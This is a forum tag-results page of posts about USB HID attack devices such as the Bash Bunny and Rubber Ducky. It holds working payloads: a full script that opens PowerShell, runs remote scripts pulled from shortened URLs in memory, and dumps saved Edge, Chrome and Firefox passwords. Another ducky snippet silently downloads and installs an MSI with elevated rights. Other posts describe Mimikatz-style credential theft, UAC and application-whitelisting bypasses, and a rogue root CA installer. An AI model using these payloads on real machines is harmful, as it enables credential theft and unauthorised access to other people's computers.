Showing results for tags 'HID'.

Found 17 results

  1. [PAYLOAD] MrRobot

    So I wanted to mimic the Mimikatz ducky script that was used in Mr. Robot. I also figured that since there's an ethernet attack, why not dl/upload from a small python webserver instead of sending externally. Plus I don't have to worry about mounting the bunny drive to exfiltrate. Basically it starts with a HID powershell attack with UAC bypass, sleeps until the RNDIS ethernet attack starts, then resumes to download a mimidogz powershell script that executes in memory, then POSTs the results to the python webserver. Finally the data is moved to the loot folder and the attack is done. https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/MrRobot
  2. Introducing the latest Composite Firmware - Codename: The Twin Duck

    The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. It's multi-OS, multi-lingual and comes in three flavours:

    c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions)
    c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK
    c_duck_v2_S002.hex - Triggered on Ducky's GPIO only!

    Depending on your circumstances, you may want to use either one of these available firmwares. Downloads: http://code.google.c.../downloads/list Please test and post feedback here. Snake
  3. [PAYLOAD] BrowserCreds

    Was thinking of ways to dump browser creds without the use of Nirsoft programs, so screwing around with some powershell and some scripts I found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute them, and store the results in \loot\BrowserCreds\%computername%.txt. Tested on Win10 with Delays that worked for my laptop, so they may need adjusting; let me know of any errors you come across. https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt

    #!/bin/bash
    #
    # Title:   BrowserCreds
    # Author:  illwill
    # Version: 0.1
    #
    # Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
    # then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
    # Credits to these guys for their powershell scripts:
    # https://github.com/sekirkity/BrowserGather  BrowserGather.ps1
    # https://github.com/EmpireProject/Empire     Get-FoxDump.ps1
    #script
    # Blue...............Running Script
    # Purple.............Got Browser Creds

    LED R 200
    LOOTDIR=/root/udisk/loot/BrowserCreds
    mkdir -p $LOOTDIR
    ATTACKMODE HID STORAGE
    LED B 200
    # wait 6 seconds for the storage to popup
    Q DELAY 6000
    Q GUI r
    Q DELAY 100
    Q STRING POWERSHELL
    Q ENTER
    Q DELAY 500
    Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
    Q ENTER
    Q DELAY 100
    #Dump Credential Vault (I.E./Edge)
    Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
    Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
    Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
    Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    #Dump Chrome Creds
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    Q STRING exit
    Q ENTER
    Q DELAY 2000
    #Open 32bit powershell and Dump Firefox Creds
    Q GUI r
    Q DELAY 100
    Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
    Q ENTER
    Q DELAY 2000
    Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
    Q ENTER
    Q DELAY 100
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    Q STRING exit
    Q ENTER
    sync
    LED R B 200
  4. Well, I'm not gonna lie, I first saw this on another YouTube channel by the name of Seytonic, and I originally wasn't gonna show how to flash this and just demonstrate the various ducky code to Digispark code converters that came out since his video, but I still hope you all enjoy and learn something from this video. PS: This device isn't as good as the USB Rubber Ducky but it's still very useful and cheap enough that if you lose it you've got nothing to worry about. Click here for all links for all drivers and converters used in the video.
  5. Run admin Executable

    Hi, there is something I don't understand with the Bash Bunny... I don't know, I feel like it's too hard for my brain to understand how it works compared to the Rubber Ducky, so I need some help. I have this on a Rubber Ducky; it's pretty basic and does what I want: starting an admin powershell, asking for admin and THEN running my command (download a file, output that file and run it quietly):

    DELAY 1500
    GUI r
    DELAY 1000
    STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""
    ENTER
    DELAY 1000
    ALT o
    ALT y

    So how would be the best way to do that without requiring the download, because the file will be on the Bash Bunny, either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program won't install correctly. I can't get it to open an admin powershell and then get the drive letter and execute my program all on one line, and ask for approval before actually installing the program (time saver). Thanks a lot
  6. The HID is coming from inside the Bunny!

    Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
  7. [Payload] Rooter

    Discussion Thread for Root CA installer. (No Local Admin Rights necessary) Current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working), pull request waiting.

    Small Howto: create a self-signed root CA

    Create the Root Certificate (Done Once)
    Creating the root certificate is easy and can be done quickly. Once you do these steps, you'll end up with a root SSL certificate that you'll install on all of your desktops, and a private key you'll use to sign the certificates that get installed on your various devices.

    Create the Root Key
    The first step is to create the private root key, which only takes one step. In the example below, I'm creating a 2048 bit key:

    openssl genrsa -out rootCA.key 2048

    The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3:

    openssl genrsa -des3 -out rootCA.key 2048

    You'll be prompted to give a password, and from then on you'll be challenged for the password every time you use the key. Of course, if you forget the password, you'll have to do all of this all over again. The next step is to self-sign this certificate.

    openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem

    This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit.

    You are about to be asked to enter information that will be incorporated
    into your certificate request.
    What you are about to enter is what is called a Distinguished Name or a DN.
    There are quite a few fields but you can leave some blank
    For some fields there will be a default value,
    If you enter '.', the field will be left blank.
    -----
    Country Name (2 letter code) [AU]:US
    State or Province Name (full name) [Some-State]:Oregon
    Locality Name (eg, city) []:Portland
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords
    Organizational Unit Name (eg, section) []:IT
    Common Name (eg, YOUR name) []:Data Center Overlords
    Email Address []:none@none.com

    Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that the root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  8. Hi, my problem is that when I tried:

    ATTACKMODE HID STORAGE
    DUCKY_LANG ca
    LED R B
    QUACK DELAY 1500
    LED B
    QUACK GUI r
    LED G
    QUACK DELAY 1000
    LED R FAST
    QUACK STRING Powershell -WindowStyle............insert the magic here
    QUACK ENTER
    LED R G B

    It stays blinking red fast... indefinitely. Tried a couple of things but I don't know, is it related to my language being bad? Because in the languages folder I do have all the languages...
  9. [PAYLOAD] PSAttack

    For Windows targets with .NET 4.0. Opens powershell with UAC bypass, waits for the webserver to start, determines if the target is 32 or 64 bit, then downloads the PSAttack .csproj file onto the target and compiles it within MSBuild using 'Inline Tasks' to bypass Application Whitelisting and Device Guard.

    PSAttack from https://github.com/jaredhaight/psattack
    MSBuild Inline Task bypass from @subtee http://subt0x10.blogspot.nl/2016/09/bypassing-application-whitelisting.html
    PSA x32 & x64 .csproj files from Nicky Tyrer https://gist.github.com/NickTyrer/8389c3d5698511f5c81bc472ee49a11c
    https://github.com/xillwillx/BashBunny/tree/master/PSAttack
  10. Teensy or Rubber Ducky?

    I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (I understand preference, but I'm more interested in the speed and flexibility aspect of the two as well as ease of deployment.) Also, I was wondering if there was a way to turn a Teensy into a faux Rubber Ducky, in regards to making it possible to use the Rubber Ducky coding language on a Teensy?
  11. [PAYLOAD] PrivEscChecker

    https://github.com/xillwillx/BashBunny/tree/master/PrivEscChecker

    Checks a Windows box for unpatched vulns that allow privilege escalation, then outputs results to /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%. Can be used locally or webdls the script from github. Credits to rasta-mouse for their powershell script: https://github.com/rasta-mouse/Sherlock

    Tested on: Windows 7 SP1 32-bit / Windows 7 SP1 64-bit / Windows 8 64-bit / Windows 10 64-bit

    LED Status
    Blue (blinking)    Running Powershell script
    Purple (blinking)  Checking Results
    Green (blinking)   Found Possible Privilege Escalation
    Red (solid)        No Possible Privilege Escalation

    TO-DO: Add more priv checks. Eventually add PowerShellMafia/PowerSploit to check for unquoted paths, dll hijacking, editable services, and other misconfigurations...
  12. KeeLog Keyboard Logger

    First off, thank you for creating such a remarkable device! I haven't stopped playing with this since it arrived yesterday afternoon. :) I have a USB keylogger from KeeLog.com and I either forgot the password or else there is something wrong with the unit. It's been a few years since I last played with it so I don't know what its issue is wrt the keyboard sequence. The way it works is that it passes through your keyboard to the host computer while logging the input. If you simultaneously press the secret keys, it will register the keylogger as a storage device. By default the secret keyboard sequence is KBS. Now these keys need to be pressed simultaneously and not one after the other. Therefore "QUACK STRING KBS" won't work. I copied a snippet of the Ducky script for my purposes to be able to send raw keyboard sequences. Here is a script I named "K" to send these raw sequences:

    #!/usr/bin/env python
    import sys

    def hidg_write(elements):
        # One 8-byte HID keyboard report: modifier, reserved, then up to six keycodes
        values = bytearray(elements)
        # All-zero report releases every key
        not_hold = bytearray([0, 0, 0, 0, 0, 0, 0, 0])
        hidg = open("/dev/hidg0", "wb")
        hidg.write(values)
        hidg.write(not_hold)
        hidg.close()

    # Report bytes are given on the command line as hex, e.g. K 00 00 0e 05 16 00 00 00
    elements = sys.argv[1:]
    elements = [int(i, 16) for i in elements]
    hidg_write(elements)

    I then created the following NodeJS application to return every keyboard combination. The output is a valid payload.txt. The "Combinatorics.bigCombination" returns a sequence that doesn't repeat. Therefore there would only be an entry for "KBS" and not for "SBK" or "KSB", etc.

    var Combinatorics = require('js-combinatorics');

    console.log("source bunny_helpers.sh");
    console.log("ATTACKMODE HID");
    console.log("LED R");
    console.log("QUACK DELAY 5000");
    console.log("LED B 200");

    // HID usage IDs 0x04..0x1d are the letters a..z; take every 3-letter combination
    var cmb, a;
    cmb = Combinatorics.bigCombination(["04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d"], 3);
    while (a = cmb.next()) {
        // Press the three keys in a single report, then release
        console.log("K 00 00 " + a.join(" ") + " 00 00 00");
        console.log("Q DELAY 500");
        console.log("Q ENTER");
    }
    console.log("LED G");

    Connected to my keylogger, powered up the BashBunny to my attack switch, opened up a text editor to collect all of the key sequences... and while it went through each combination and correctly typed it into my editor... it didn't unlock the keylogger. :( While I'll continue with inserting additional delays, random keys, etc... I'm throwing this out here in hopes that someone may be able to see why this won't open up my keylogger. Thanks!
  13. [PAYLOAD] JackRabbit

    Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a Powershell script into memory, then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%. https://github.com/xillwillx/BashBunny/tree/master/JackRabbit Tested on Win 7/8/10; may need to change some Delay timings, and the IE/Edge cred dump is not working in 7.
  14. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  15. [PAYLOAD] RickRoll Prank

    Uses a HID/Ethernet Attack to run a RickRoll powershell script https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/RickRoll
  16. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of Dells and noticed this: http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 It looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  17. Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! It's a really slow shell!). Anyway, the idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case the LANTurtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example. The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.